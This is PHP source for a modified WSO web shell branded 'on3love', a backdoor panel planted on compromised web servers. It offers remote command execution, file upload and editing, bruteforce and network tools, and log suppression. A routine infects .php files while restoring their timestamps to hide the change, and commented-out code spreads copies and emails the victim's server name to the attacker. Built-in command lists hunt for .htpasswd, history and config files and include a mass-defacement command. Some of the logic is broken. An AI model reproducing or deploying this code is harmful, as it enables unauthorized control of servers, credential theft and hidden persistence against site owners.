		 if(!in_array($_SERVER['REMOTE_ADDR'], $ipauth)){
      //  dynamicUpdater($_SERVER['REMOTE_ADDR'], '/Telkom/');
         if ($_SERVER['REMOTE_ADDR'] != $ipauth) {
            on3loveAksi($aksi, $emailku, $scatterName, $redirecto);
         } }
         break;
   }
} else
   { 
   $iptype = 'Localhost';
   }
   
   }elseif(authtype == 'url'){if ($_SERVER['HTTP_REFERER'] != $urlauth) {on3loveAksi($aksi, $emailku, $scatterName, $redirecto);} }

/**
  switch($iptype)
  {
  case 'static':
  if ((md5($_SERVER['REMOTE_ADDR']) != $myip)) {
  $disable_functions = @ini_get('disable_functions');$home_cwd = @getcwd();if (isset($_POST['c'])) @chdir($_POST['c']);$cwd = @getcwd();if ($os == 'win') {$home_cwd = str_replace("\\", "/", $home_cwd);$cwd = str_replace("\\", "/", $cwd);}if ($cwd[strlen($cwd) - 1] != '/')$cwd .= '/';
  if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') {
  switch ($aksi) {
  case 'selfkill': unlink(getcwd() . "/" . $_SERVER['PHP_SELF']);
  break;
  case 'redirect': // header("location: {$redirecto}");
  break;
  case 'scatter+m': foreach ($scatterName as $pname) {
  copy($GLOBALS['cwd'] . $_SERVER['PHP_SELF'], $GLOBALS['cwd']);
  mail($emailku, $_SERVER['SERVER_NAME'], $_SERVER['SERVER_NAME'] . $pname);
  } break;
  case 'scatter+k': foreach ($scatterName as $pname) {
  copy($GLOBALS['cwd'] . $_SERVER['PHP_SELF'], $GLOBALS['cwd']);
  } unlink($GLOBALS['cwd'] . $_SERVER['PHP_SELF']);
  break;
  case 'scatter+mk': foreach ($scatterName as $pname) {
  copy($GLOBALS['cwd'] . $_SERVER['PHP_SELF'], $GLOBALS['cwd']);
  mail($emailku, $_SERVER['SERVER_NAME'], $_SERVER['SERVER_NAME'] . $pname);
  } unlink($GLOBALS['cwd'] . $_SERVER['PHP_SELF']);
  break;
  //	default: @header("location: {$_SERVER['HTTP_HOST']}"); break;
  }
  }
  } else {

  };
  break;
  case 'dynamic':

  if ((md5($_SERVER['REMOTE_ADDR']) != md5(gethostbyname($ipdyn)))) {
  $disable_functions = @ini_get('disable_functions');$home_cwd = @getcwd();if (isset($_POST['c'])) @chdir($_POST['c']);$cwd = @getcwd();if ($os == 'win') {$home_cwd = str_replace("\\", "/", $home_cwd);$cwd = str_replace("\\", "/", $cwd);}if ($cwd[strlen($cwd) - 1] != '/')$cwd .= '/';
  if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') {
  switch ($aksi) {
  case 'selfkill': unlink(getcwd() . "/" . $_SERVER['PHP_SELF']);
  break;
  case 'redirect': // header("location: {$redirecto}");
  break;
  case 'scatter+m': foreach ($scatterName as $pname) {
  copy($GLOBALS['cwd'] . $_SERVER['PHP_SELF'], $GLOBALS['cwd']);
  mail($emailku, $_SERVER['SERVER_NAME'], $_SERVER['SERVER_NAME'] . $pname);
  } break;
  case 'scatter+k': foreach ($scatterName as $pname) {
  copy($GLOBALS['cwd'] . $_SERVER['PHP_SELF'], $GLOBALS['cwd']);
  } unlink($GLOBALS['cwd'] . $_SERVER['PHP_SELF']);
  break;
  case 'scatter+mk': foreach ($scatterName as $pname) {
  copy($GLOBALS['cwd'] . $_SERVER['PHP_SELF'], $GLOBALS['cwd']);
  mail($emailku, $_SERVER['SERVER_NAME'], $_SERVER['SERVER_NAME'] . $pname);
  } unlink($GLOBALS['cwd'] . $_SERVER['PHP_SELF']);
  break;
  //	default: @header("location: {$_SERVER['HTTP_HOST']}"); break;
  }
  }
  } else {

  };
  break;
  default: break;

  } * */
//=====================================================================================================
$r3belc0de = "WSOmod 2.5.2 [ViewPanel]";  // :)

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@ini_set('memory_limit', '32M');
@define('WSO_VERSION', 'mod 2.5.2');

if (get_magic_quotes_gpc()) {

   function WSOstripslashes($array) {
      return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
   }

   $_POST = WSOstripslashes($_POST);
   $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
// die("<script language=JavaScript>eval(unescape('var%20c23fLx_l%3D%27ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B%2F%27%3B%20function%20x93_s%28str%29%20%7B%20str%3Dstr.split%28%27%40%27%29.join%28%27CAg%27%29%3B%20str%3Dstr.split%28%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dstr.split%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%20bt%2C%20dt%20%3D%20%27%27%3B%20for%28i%3D0%3B%20i%3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%20%3D%20%28c23fLx_l.indexOf%28str.charAt%28i%29%29%20%26%200xff%29%20%3C%3C18%20%7C%20%28c23fLx_l.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%200xff%29%20%3C%3C12%20%7C%20%28c23fLx_l.indexOf%28str.charAt%28i%20%2B2%29%29%20%26%200xff%29%20%3C%3C%206%20%7C%20c23fLx_l.indexOf%28str.charAt%28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%20String.fromCharCode%28%28bt%20%26%200xff0000%29%20%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2C%20bt%20%26%200xff%29%3B%20%7D%20if%28str.charCodeAt%28i%20-2%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-2%29%29%3B%20%7D%20else%20if%28str.charCodeAt%28i%20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D%3B%20%7D')); document.write(x93_s('PHByZSBhbGlnbj1jZ!0ZXI+PGZvcm0gbWV0aG9kPXBvc3Q+PGlucHV0IHN0eWxlPSdvdXRsa!lOm5vbmU7Y29sb3I6d2hpdGU7Ym9yZGVyOjBweCBzb2xpZDsnIHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzPjxpbnB1dCBzdHlsZT0nZGlzcGxheTpub25lJyB0eXBlPXN1Ym1pdCB2YWx1ZT0nPj4nPjwvZm9ybT48L3ByZT4=')); </script>
// ");
   die("<pre align=center><form method=post><input style='outline:none;color:white;border:0px solid;' type=password name=pass><input style='display:none' type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
   $_COOKIE[$k] = $v;
   setcookie($k, $v);
  // echo '<script>alert("Successful");</script>';
}

if (!empty($auth_pass)) {
   if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)){
      WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);


   }
   if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)){
      wsoLogin();}
}


if (strtolower(substr(PHP_OS, 0, 3)) == "win")
   $os = 'win';
else
   $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if (!$safe_mode)
   error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c']))
   @chdir($_POST['c']);
$cwd = @getcwd();
if ($os == 'win') {
   $home_cwd = str_replace("\\", "/", $home_cwd);
   $cwd = str_replace("\\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/')
   $cwd .= '/';

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
   $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax;

if ($os == 'win')
   $aliases = array(
       "List Directory" => "dir",
       "Find index.php in current dir" => "dir /s /w /b index.php",
       "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
       "Show active connections" => "netstat -an",
       "Show running services" => "net start",
       "User accounts" => "net user",
       "Show computers" => "net view",
       "ARP Table" => "arp -a",
       "IP Configuration" => "ipconfig /all"
   );
else
   $aliases = array(
       "List dir" => "ls -lha",
       "list file attributes on a Linux second extended file system" => "lsattr -va",
       "show opened ports" => "netstat -an | grep -i listen",
       "process status" => "ps aux",
       "Find" => "",
       "find all suid files" => "find / -type f -perm -04000 -ls",
       "find suid files in current dir" => "find . -type f -perm -04000 -ls",
       "find all sgid files" => "find / -type f -perm -02000 -ls",
       "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
       "find config.inc.php files" => "find / -type f -name config.inc.php",
       "find config* files" => "find / -type f -name \"config*\"",
       "find config* files in current dir" => "find . -type f -name \"config*\"",
       "find all writable folders and files" => "find / -perm -2 -ls",
       "find all writable folders and files in current dir" => "find . -perm -2 -ls",
       "find all service.pwd files" => "find / -type f -name service.pwd",
       "find service.pwd files in current dir" => "find . -type f -name service.pwd",
       "find all .htpasswd files" => "find / -type f -name .htpasswd",
       "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
       "find all .bash_history files" => "find / -type f -name .bash_history",
       "find .bash_history files in current dir" => "find . -type f -name .bash_history",
       "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
       "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
       "Locate" => "",
       "locate httpd.conf files" => "locate httpd.conf",
       "locate vhosts.conf files" => "locate vhosts.conf",
       "locate proftpd.conf files" => "locate proftpd.conf",
       "locate psybnc.conf files" => "locate psybnc.conf",
       "locate my.conf files" => "locate my.conf",
       "locate admin.php files" => "locate admin.php",
       "locate cfg.php files" => "locate cfg.php",
       "locate conf.php files" => "locate conf.php",
       "locate config.dat files" => "locate config.dat",
       "locate config.php files" => "locate config.php",
       "locate config.inc files" => "locate config.inc",
       "locate config.inc.php" => "locate config.inc.php",
       "locate config.default.php files" => "locate config.default.php",
       "locate config* files " => "locate config",
       "locate .conf files" => "locate '.conf'",
       "locate .pwd files" => "locate '.pwd'",
       "locate .sql files" => "locate '.sql'",
       "locate .htpasswd files" => "locate '.htpasswd'",
       "locate .bash_history files" => "locate '.bash_history'",
       "locate .mysql_history files" => "locate '.mysql_history'",
       "locate .fetchmailrc files" => "locate '.fetchmailrc'",
       "locate backup files" => "locate backup",
       "locate dump files" => "locate dump",
       "locate priv files" => "locate priv",
       "index.* mass defacement" => 'sed -i -e \'s/test/g\' index.*',
       "log onto user without password" => "cut -d: -f1,2,3 /etc/passwd | grep ::"
   );

function wsoHeader() { 
   global $ipauth, $iptype, $aksi, $infeksi, $cekinfeksi;
   function on3lovepanel($v){
   if(!isset($_COOKIE['on3loveconf']))
      {
      setcookie('on3loveconf', $v, time()+60);
      echo "<script>window.onload = function(){
           document.getElementById('on3love').style.display = 'block';};</script>";
      }else
       echo "<script>window.onload = function(){
           document.getElementById('on3love').style.display = 'none';};</script>";
      }
   on3lovepanel(true);
   
   if (empty($_POST['charset']))
      $_POST['charset'] = $GLOBALS['default_charset'];
   global $color;
   if (!$color)
      $color = 'white';

   echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#777}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
 function ReadCookie(cookieName) {
 var theCookie=\" \"+document.cookie;
 var ind=theCookie.indexOf(\" \"+cookieName+\"=\");
 if (ind==-1) ind=theCookie.indexOf(\";\"+cookieName+\"=\");
 if (ind==-1 || cookieName==\"\") return \"\";
 var ind1=theCookie.indexOf(\";\",ind+1);
 if (ind1==-1) ind1=theCookie.length; 
 return unescape(theCookie.substring(ind+cookieName.length+2,ind1));
}
function Get_Cookie( name ) {

var start = document.cookie.indexOf( name + \"=\" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( \";\", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
        function xload(){
           if(!Get_Cookie('on3loveconf')){
           document.getElementById('on3love').style.display = 'block';
           
           }
           if(Get_Cookie('on3loveconf')){
           document.getElementById('on3love').style.display = 'none';}};
           
function klik(layer){
var taiLayer = document.getElementById(layer).style.display;
if(taiLayer=='block'){
document.getElementById(layer).style.display='none';
} else { 
document.getElementById(layer).style.display='block';}
}
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
    var p1_ = '" . ((strpos(@$_POST['p1'], "\n") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
    var p2_ = '" . ((strpos(@$_POST['p2'], "\n") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
    var p3_ = '" . ((strpos(@$_POST['p3'], "\n") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';
    var d = document;
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
                    
</script>
<head><body ><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
   $freeSpace = @diskfreespace($GLOBALS['cwd']);
   $totalSpace = @disk_total_space($GLOBALS['cwd']);
   $totalSpace = $totalSpace ? $totalSpace : 1;
   $release = @php_uname('r');
   $kernel = @php_uname('s');
   $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
   if (strpos('Linux', $kernel) !== false)
      $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
   else
      $explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
   if (!function_exists('posix_getegid')) {
      $user = @get_current_user();
      $uid = @getmyuid();
      $gid = @getmygid();
      $group = "?";
   } else {
      $uid = @posix_getpwuid(posix_geteuid());
      $gid = @posix_getgrgid(posix_getegid());
      $user = $uid['name'];
      $uid = $uid['uid'];
      $group = $gid['name'];
      $gid = $gid['gid'];
   }

   $cwd_links = '';
   $path = explode("/", $GLOBALS['cwd']);
   $n = count($path);
   for ($i = 0; $i < $n - 1; $i++) {
      $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
      for ($j = 0; $j <= $i; $j++)
         $cwd_links .= $path[$j] . '/';
      $cwd_links .= "\")'>" . $path[$i] . "/</a>";
   }

   $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
   $opt_charsets = '';
   foreach ($charsets as $item)
      $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';

   $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network', 'on3love' => 'on3love');
   if (!empty($GLOBALS['auth_pass']))
      $m['Logout'] = 'Logout';
   $m['Self remove'] = 'SelfRemove';
   $menu = '';
   foreach ($m as $k => $v)
      $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';

   $drives = "";
   if ($GLOBALS['os'] == 'win') {
      foreach (range('c', 'z') as $drive)
         if (is_dir($drive . ':\\'))
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
   }
   //$test = "eval(gzinflate(base64_decode('BcFHkqNIAADAr8xtuoODhC9iT3gnCoTwlwmsgAKE8PD6zSy3tPt5X81QdelS/mTpXDLUv6LMP0X581fLL20aF56XJTcCaGUBeuxmCj/N/hnryfOKTu5MOfWpiuBi1JCZzeUyWUZYkFTUSM6zuEED1V7FGnGRDcBeh95cyaKr57Z2FhR2dtLeZT/IkgM/w4LpJo6Lddpurq7qvdWVdjT5sUVo0qpjkhtKX1p5PPEgI5RoQw2YLtx/b2XNRIECE5nobWK6h29ZVcNLD5ktZs7ado4iUnQ5+GhvNujsK+nucBFzjjSo8a5AevPwdZSL+jvuVuIjn6nSGV2x5rJPUnCn+1QA9QnuB+7kvt8PJFjqKQfTF/GvAcYhB1Dmv+3lHttnJciSuCz6yRFv2q26hocrN5SqU6Bp1z2z95Z6nz/EzvHTAHQd9vpqXkZEzfs1M2ydsGY0eP5TzCfpfgxVOU5bfbnUnMhL/BX6yGBt1xJpmkgSB+gW32CVozka4Z3Zg/i+Fg44B8KKa0HnoIWzFQ0tZSi7CWMf6KdlyCayGmNd8vxWxlnyGYmjSrxrURPI7p1vjoQYBTIoKJxsHP9wP6kYUKsh8xfOBHQiQt2IqtCzLMC7momd5Hdhp8YrBcSqGq0cPQem0AhCXP8y9K6lOujOL6W0z8hqZuNBpuMSXMp8os/TOhw+39wK4QAbB6VYAlcObVcWN66deM/VrvDdCxOZflREKArOO+oJ6yHw+VdP+o6kwf7SDin6fA0FwfkwUCfkemt0mw0mQIotRWDvFDsTY5iUy+l4HnON14lxBRXX5N5CaKmvnNXaVKCGLHZvGwzUAq43RGch3o1RTRrQaxchFnEJhgTA0zGfw7KFNGQQtN4KSsPtKwITprASaRjcJp9VCvIGd14I9EKI9hdpbWvWmUxavFp2qcaoNALz7NeEEFgqJDna3bEHCNEqrPETndVCVvrA+44f0lFm44G/zjqMreCmYQ/1trH0rSI5BhTV39/f3//+/A8=')))";
   /**
     while(preg_match("/eval\(gzinflate/",$test)){
     $a=preg_replace("/< \?|\?>/", "", $test);
     @eval(preg_replace("/eval/", "\$test=", $a));
     }
     print trim(@eval(preg_replace("/eval/", "\$test=", $a)));
    * */
   if (($GLOBALS['iptype'] == 'static') && (md5($_SERVER['REMOTE_ADDR']) == $GLOBALS['ipauth']))
      $ipmatch = 'Matching IP';
   elseif((is_array($GLOBALS['ipauth'])) || (in_array(md5($_SERVER['REMOTE_ADDR']), $GLOBALS['ipauth']))){
      if(isValidMd5($ipshow)) $ipshow = $_SERVER['REMOTE_ADDR'];else $ipshow = md5($_SERVER['REMOTE_ADDR']);
      $ipmatch = 'Allowed IP'; }
   else
      $ipmatch = 'Unallowed <b>[Please Report to <font style="color:red">on3love92@gmail.com</font>]</b>';
	
	
   echo "
	<a href='#' onclick=\"klik('on3love');\">
     <span><font color=red><center>{$GLOBALS['r3belc0de']}</center></font></span>
	 </a>
	 <div id='on3love' style='display:none;'>
	<table class=info cellpadding=3 cellspacing=0 width=100%>
	<tr>
	<td width=1>
	  <span>
		<font color='green'>[Configuration]</font><br>
		 IP-Type:<br>
		 AuthUser:<br>
		 MD5-IP:<br>
		 InfectString:<br>
        InfectKey:<br>
		<font color='green'>[ShellModule]</font><br>
		 SHELLAction:<br>
		 REPORTmail:<br>
		 SCATTERname:
	  </span>
	</td>
	<td>
	[========================]
	<br>
	{$GLOBALS['iptype']}<br>
	<font style='color:lightgreen'>";
     
	foreach($GLOBALS['ipauth'] as $authuser => $userip) 
               {
                  if(($_SERVER['REMOTE_ADDR'] == $userip) || (md5($_SERVER['REMOTE_ADDR']) == $userip)){
                     echo $authuser;}
            
		}
	echo "</font><br>
        ".md5($_SERVER['REMOTE_ADDR'])." (".$_SERVER['REMOTE_ADDR'].")"." = {$ipshow} - {$ipmatch}<br>
	{$cekinfeksi}<br>
        infectkey(on3loveCMD, on3loveRFI) [file.php?(infectkey)] <br>
	[========================]<br>
	{$GLOBALS['aksi']}<br>
	{$GLOBALS['emailku']}<br>
	";
   foreach ($GLOBALS['scatterName'] as $pnm)
      echo "<font color=red>[</font>{$pnm}<font color=red>]</font>";
   echo "</td></tr></table></div>";

   echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr>
	<td width=1>
	<span>
	Uname:<br>
	User:<br>
	Php:<br>
	Hdd:<br>
	Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '
	</span>
	</td>'
   . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>')
   . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
   . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
   . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}

function wsoFooter() {
   $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
   echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
	<tr>
		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
		<td><form method='post' ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMAn'>
		<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
	</tr></table></div></body></html>";
}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {

   function posix_getpwuid($p) {
      return false;
   }

}
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {

   function posix_getgrgid($p) {
      return false;
   }

}

function wsoEx($in) {
   $out = '';
   if (function_exists('exec')) {
      @exec($in, $out);
      $out = @join("\n", $out);
   } elseif (function_exists('passthru')) {
      ob_start();
      @passthru($in);
      $out = ob_get_clean();
   } elseif (function_exists('system')) {
      ob_start();
      @system($in);
      $out = ob_get_clean();
   } elseif (function_exists('shell_exec')) {
      $out = shell_exec($in);
   } elseif (is_resource($f = @popen($in, "r"))) {
      $out = "";
      while (!@feof($f))
         $out .= fread($f, 1024);
      pclose($f);
   }
   return $out;
}

function wsoViewSize($s) {
   if ($s >= 1073741824)
      return sprintf('%1.2f', $s / 1073741824) . ' GB';
   elseif ($s >= 1048576)
      return sprintf('%1.2f', $s / 1048576) . ' MB';
   elseif ($s >= 1024)
      return sprintf('%1.2f', $s / 1024) . ' KB';
   else
      return $s . ' B';
}

function wsoPerms($p) {
   if (($p & 0xC000) == 0xC000)
      $i = 's';
   elseif (($p & 0xA000) == 0xA000)
      $i = 'l';
   elseif (($p & 0x8000) == 0x8000)
      $i = '-';
   elseif (($p & 0x6000) == 0x6000)
      $i = 'b';
   elseif (($p & 0x4000) == 0x4000)
      $i = 'd';
   elseif (($p & 0x2000) == 0x2000)
      $i = 'c';
   elseif (($p & 0x1000) == 0x1000)
      $i = 'p';
   else
      $i = 'u';
   $i .= (($p & 0x0100) ? 'r' : '-');
   $i .= (($p & 0x0080) ? 'w' : '-');
   $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
   $i .= (($p & 0x0020) ? 'r' : '-');
   $i .= (($p & 0x0010) ? 'w' : '-');
   $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
   $i .= (($p & 0x0004) ? 'r' : '-');
   $i .= (($p & 0x0002) ? 'w' : '-');
   $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
   return $i;
}

function wsoPermsColor($f) {
   if (!@is_readable($f))
      return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
   elseif (!@is_writable($f))
      return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
   else
      return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}

function wsoScandir($dir) {
   if (function_exists("scandir")) {
      return scandir($dir);
   } else {
      $dh = opendir($dir);
      while (false !== ($filename = readdir($dh)))
         $files[] = $filename;
      return $files;
   }
}

function wsoWhich($p) {
   $path = wsoEx('which ' . $p);
   if (!empty($path))
      return $path;
   return false;
}

function on3loveInfectnTouch($item) {
   global $cekinfeksi, $infeksi;
   if ((is_file($item)) && (is_readable($item)) && (preg_match('/\.php$/i', basename($item))) == true) {

	  $holder = filemtime($item);
      $oft = @fopen($item, "r");
      $isifile = implode("", file($item));
      @unlink($item);
      $bukafile = @fopen($item, "a+");
      if ($bukafile) {

         if (!preg_match($cekinfeksi, @fread($bukafile, filesize($item)))) {
            if (fputs($bukafile, $isifile . PHP_EOL . $infeksi))
            $_POST['a'] = 'FilesMan';
            $_POST['surga'] = "<script>alert('Infected {$item}');</script>";
            echo "<script>alert('Infected {$item}');</script>";
            fclose($bukafile);
         }
      }

      $date = strtotime('27 June 1992');
      touch($item, $holder);
   } elseif (is_dir($item) && is_readable($item)) {
      echo "<script>alert('Fail to infect {$filestrip}')</script>";
   }
}

function actionSecInfo() {
   wsoHeader();
   echo '<h1>Server security information</h1><div class=content>';

   function wsoSecParam($n, $v) {
      $v = trim($v);
      if ($v) {
         echo '<span>' . $n . ': </span>';
         if (strpos($v, "\n") === false)
            echo $v . '<br>';
         else
            echo '<pre class=ml1>' . $v . '</pre>';
      }
   }

   wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
   if (function_exists('apache_get_modules'))
      wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
   wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
   wsoSecParam('Open base dir', @ini_get('open_basedir'));
